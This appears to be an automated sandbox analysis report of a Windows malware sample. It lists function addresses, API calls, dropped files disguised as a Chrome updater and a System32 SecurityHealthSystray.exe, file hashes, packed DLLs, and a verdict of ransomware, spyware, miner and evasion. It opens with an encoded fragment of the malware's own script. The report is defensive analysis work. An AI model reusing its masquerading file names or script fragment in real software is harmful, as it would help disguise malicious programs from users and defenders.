AAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B32253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,	2_2_000001F91B32253C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B3228C8 NtEnumerateValueKey,NtEnumerateValueKey,	2_2_000001F91B3228C8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B322B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,	2_2_000001F91B322B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A42B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,	4_2_00000201D1A42B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A42244 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	4_2_00000201D1A42244
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A4253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,	4_2_00000201D1A4253C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A428C8 NtEnumerateValueKey,NtEnumerateValueKey,	4_2_00000201D1A428C8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A427FC NtEnumerateKey,NtEnumerateKey,	4_2_00000201D1A427FC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A4202C NtQuerySystemInformation,StrCmpNIW,	4_2_00000201D1A4202C

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

Code function: 0_2_00D97FD3: _wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00D97FD3

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Windows\Prefetch\HpQPPZazcv.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Windows\Prefetch\7963a3365bd9f9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00D9F963	0_2_00D9F963
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00D99906	0_2_00D99906
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DAEA07	0_2_00DAEA07
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DA8C7E	0_2_00DA8C7E
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DA60F7	0_2_00DA60F7
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DC4044	0_2_00DC4044
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DA9111	0_2_00DA9111
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DA2125	0_2_00DA2125
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DA82D0	0_2_00DA82D0
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00D9E394	0_2_00D9E394
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DA6445	0_2_00DA6445
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DA1476	0_2_00DA1476
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DA976F	0_2_00DA976F
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DB7738	0_2_00DB7738
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DA0949	0_2_00DA0949
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DB7967	0_2_00DB7967
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DBFA90	0_2_00DBFA90
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00D93AB7	0_2_00D93AB7
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00D94C6E	0_2_00D94C6E
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DA5E86	0_2_00DA5E86
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00D92FCB	0_2_00D92FCB
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DA0FAC	0_2_00DA0FAC
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DBFF3E	0_2_00DBFF3E
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D021038	1_2_00007FF67D021038
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D017F4C	1_2_00007FF67D017F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D007960	1_2_00007FF67D007960
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D026470	1_2_00007FF67D026470
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D0273BC	1_2_00007FF67D0273BC
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D012E50	1_2_00007FF67D012E50
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D026E70	1_2_00007FF67D026E70
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D0266EC	1_2_00007FF67D0266EC
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D011D90	1_2_00007FF67D011D90
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D01E5B0	1_2_00007FF67D01E5B0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D017D98	1_2_00007FF67D017D98
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D017F4C	1_2_00007FF67D017F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D0090D0	1_2_00007FF67D0090D0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D02A0F8	1_2_00007FF67D02A0F8
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D01E11C	1_2_00007FF67D01E11C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D001F50	1_2_00007FF67D001F50
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D011F94	1_2_00007FF67D011F94
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D0187D0	1_2_00007FF67D0187D0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D0137E0	1_2_00007FF67D0137E0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D021FE4	1_2_00007FF67D021FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D016030	1_2_00007FF67D016030
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D02481C	1_2_00007FF67D02481C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D011980	1_2_00007FF67D011980
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D0121A0	1_2_00007FF67D0121A0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D01A530	1_2_00007FF67D01A530
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D021038	1_2_00007FF67D021038
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D024380	1_2_00007FF67D024380
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D011B84	1_2_00007FF67D011B84
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D0123A4	1_2_00007FF67D0123A4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D013BE4	1_2_00007FF67D013BE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D01EC30	1_2_00007FF67D01EC30
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B2FD0E0	2_2_000001F91B2FD0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B3038A8	2_2_000001F91B3038A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B2F1F2C	2_2_000001F91B2F1F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B322B2C	2_2_000001F91B322B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B33AEC2	2_2_000001F91B33AEC2
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B32DCE0	2_2_000001F91B32DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B3344A8	2_2_000001F91B3344A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B35D0E0	2_2_000001F91B35D0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B3638A8	2_2_000001F91B3638A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B351F2C	2_2_000001F91B351F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727261000	2_2_00007FF727261000
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727285C74	2_2_00007FF727285C74
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF72727FBD8	2_2_00007FF72727FBD8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727275040	2_2_00007FF727275040
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF72727D880	2_2_00007FF72727D880
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727271074	2_2_00007FF727271074
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF7272728C0	2_2_00007FF7272728C0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727285728	2_2_00007FF727285728
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF72727FBD8	2_2_00007FF72727FBD8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727271F30	2_2_00007FF727271F30
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727282F20	2_2_00007FF727282F20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727269FCD	2_2_00007FF727269FCD
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF72726979B	2_2_00007FF72726979B
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727270E70	2_2_00007FF727270E70
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727284F10	2_2_00007FF727284F10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF72727CD6C	2_2_00007FF72727CD6C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF7272695FB	2_2_00007FF7272695FB
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727271484	2_2_00007FF727271484
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727270C64	2_2_00007FF727270C64
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727272CC4	2_2_00007FF727272CC4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727268B20	2_2_00007FF727268B20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727280B84	2_2_00007FF727280B84
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF7272833BC	2_2_00007FF7272833BC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF7272773F4	2_2_00007FF7272773F4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727288A38	2_2_00007FF727288A38
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727271280	2_2_00007FF727271280
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727270A60	2_2_00007FF727270A60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF727277AAC	2_2_00007FF727277AAC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF72728518C	2_2_00007FF72728518C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF7272791B0	2_2_00007FF7272791B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_00007FF72727D200	2_2_00007FF72727D200
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 3_2_00007FFE13307508	3_2_00007FFE13307508
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201CFD938A8	4_2_00000201CFD938A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201CFD8D0E0	4_2_00000201CFD8D0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201CFD81F2C	4_2_00000201CFD81F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A42B2C	4_2_00000201D1A42B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A4DCE0	4_2_00000201D1A4DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A544A8	4_2_00000201D1A544A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A71F2C	4_2_00000201D1A71F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A7D0E0	4_2_00000201D1A7D0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A838A8	4_2_00000201D1A838A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727261000	4_2_00007FF727261000
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF7272695FB	4_2_00007FF7272695FB
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727285C74	4_2_00007FF727285C74
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727275040	4_2_00007FF727275040
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF72727D880	4_2_00007FF72727D880
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727271074	4_2_00007FF727271074
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF7272728C0	4_2_00007FF7272728C0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727285728	4_2_00007FF727285728
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF72727FBD8	4_2_00007FF72727FBD8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727271F30	4_2_00007FF727271F30
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727282F20	4_2_00007FF727282F20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727269FCD	4_2_00007FF727269FCD
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF72726979B	4_2_00007FF72726979B
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727270E70	4_2_00007FF727270E70
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727284F10	4_2_00007FF727284F10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF72727CD6C	4_2_00007FF72727CD6C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727271484	4_2_00007FF727271484
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727270C64	4_2_00007FF727270C64
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727272CC4	4_2_00007FF727272CC4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727268B20	4_2_00007FF727268B20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727280B84	4_2_00007FF727280B84
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF7272833BC	4_2_00007FF7272833BC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF7272773F4	4_2_00007FF7272773F4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF72727FBD8	4_2_00007FF72727FBD8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727288A38	4_2_00007FF727288A38
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727271280	4_2_00007FF727271280
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727270A60	4_2_00007FF727270A60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF727277AAC	4_2_00007FF727277AAC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF72728518C	4_2_00007FF72728518C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF7272791B0	4_2_00007FF7272791B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FF72727D200	4_2_00007FF72727D200
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA812F0	4_2_00007FFDFAA812F0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA818D0	4_2_00007FFDFAA818D0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABAB370	4_2_00007FFDFABAB370
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABEFC00	4_2_00007FFDFABEFC00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAC07B90	4_2_00007FFDFAC07B90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABAF8B5	4_2_00007FFDFABAF8B5
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA1451	4_2_00007FFDFABA1451
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA1DCF	4_2_00007FFDFABA1DCF
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA1956	4_2_00007FFDFABA1956
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA1997	4_2_00007FFDFABA1997
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA1398	4_2_00007FFDFABA1398
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA1A87	4_2_00007FFDFABA1A87
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABB11A0	4_2_00007FFDFABB11A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA13F2	4_2_00007FFDFABA13F2
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA114F	4_2_00007FFDFABA114F
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA1C94	4_2_00007FFDFABA1C94
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA1537	4_2_00007FFDFABA1537
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA6BA0	4_2_00007FFDFABA6BA0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAC00950	4_2_00007FFDFAC00950
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA15B4	4_2_00007FFDFABA15B4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA115E	4_2_00007FFDFABA115E
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA168B	4_2_00007FFDFABA168B
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA256D	4_2_00007FFDFABA256D
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAC00250	4_2_00007FFDFAC00250
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAC50740	4_2_00007FFDFAC50740
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA20AE	4_2_00007FFDFABA20AE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFABA1BDB	4_2_00007FFDFABA1BDB
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAFB4460	4_2_00007FFDFAFB4460
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAC6655F	4_2_00007FFDFAC6655F
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAC66A87	4_2_00007FFDFAC66A87
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAE17BC0	4_2_00007FFDFAE17BC0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAE03B80	4_2_00007FFDFAE03B80
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAC621B7	4_2_00007FFDFAC621B7
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAC622E8	4_2_00007FFDFAC622E8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAC64165	4_2_00007FFDFAC64165
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAC63FDA	4_2_00007FFDFAC63FDA
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFACCFA00	4_2_00007FFDFACCFA00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAC660A0	4_2_00007FFDFAC660A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFB4358A0	4_2_00007FFDFB4358A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF212F20	4_2_00007FFDFF212F20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF1A7BC0	4_2_00007FFDFF1A7BC0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF1AF710	4_2_00007FFDFF1AF710
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF212570	4_2_00007FFDFF212570
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF19E4F0	4_2_00007FFDFF19E4F0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF1B0F90	4_2_00007FFDFF1B0F90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF19DFC0	4_2_00007FFDFF19DFC0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF1AAFA0	4_2_00007FFDFF1AAFA0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF218010	4_2_00007FFDFF218010
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF200040	4_2_00007FFDFF200040
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF1E8050	4_2_00007FFDFF1E8050
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF250ED0	4_2_00007FFDFF250ED0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF1C1EC0	4_2_00007FFDFF1C1EC0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF1BAEF0	4_2_00007FFDFF1BAEF0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF202F20	4_2_00007FFDFF202F20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF1EFF20	4_2_00007FFDFF1EFF20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF240D90	4_2_00007FFDFF240D90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF1B1E00	4_2_00007FFDFF1B1E00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF1D5E50	4_2_00007FFDFF1D5E50
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF200E30	4_2_00007FFDFF200E30
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF1F1C90	4_2_00007FFDFF1F1C90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFF198C60	4_2_00007FFDFF198C60

Source: Joe Sandbox View	Dropped File: C:\Program Files\Google\Chrome\updater.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
Source: Joe Sandbox View	Dropped File: C:\ProgramData\setup.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278

Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FF727262760 appears 36 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFAC0D7E5 appears 101 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFF198800 appears 38 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFAC61EF1 appears 72 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FF7272625F0 appears 100 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFABA12EE appears 562 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFAC64057 appears 70 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFAC0D74F appears 214 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFF199660 appears 44 times
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: String function: 00007FF67D002B30 appears 47 times
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: String function: 00DB1D60 appears 31 times
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: String function: 00DB1590 appears 57 times

Source: unicodedata.pyd.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: rar.exe.2.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.2.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: wxyubnjmnlae.tmp.18.dr	Static PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Source: setup.exe.7.dr	Static PE information: Number of sections : 11 > 10
Source: updater.exe.18.dr	Static PE information: Number of sections : 11 > 10

Source: 8Ck8T5qRcC.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: libcrypto-1_1.dll.2.dr	Static PE information: Section: UPX1 ZLIB complexity 0.998771639088251
Source: libssl-1_1.dll.2.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9903694614553314
Source: python310.dll.2.dr	Static PE information: Section: UPX1 ZLIB complexity 0.99934387748315
Source: sqlite3.dll.2.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9978469358079526
Source: unicodedata.pyd.2.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9943230597527473

Source: setup.exe, 00000012.00000002.1894081702.0000012916D50000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: .SlnIX

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@147/153@3/4

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

Code function: 0_2_00D97BFF GetLastError,FormatMessageW,

0_2_00D97BFF

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

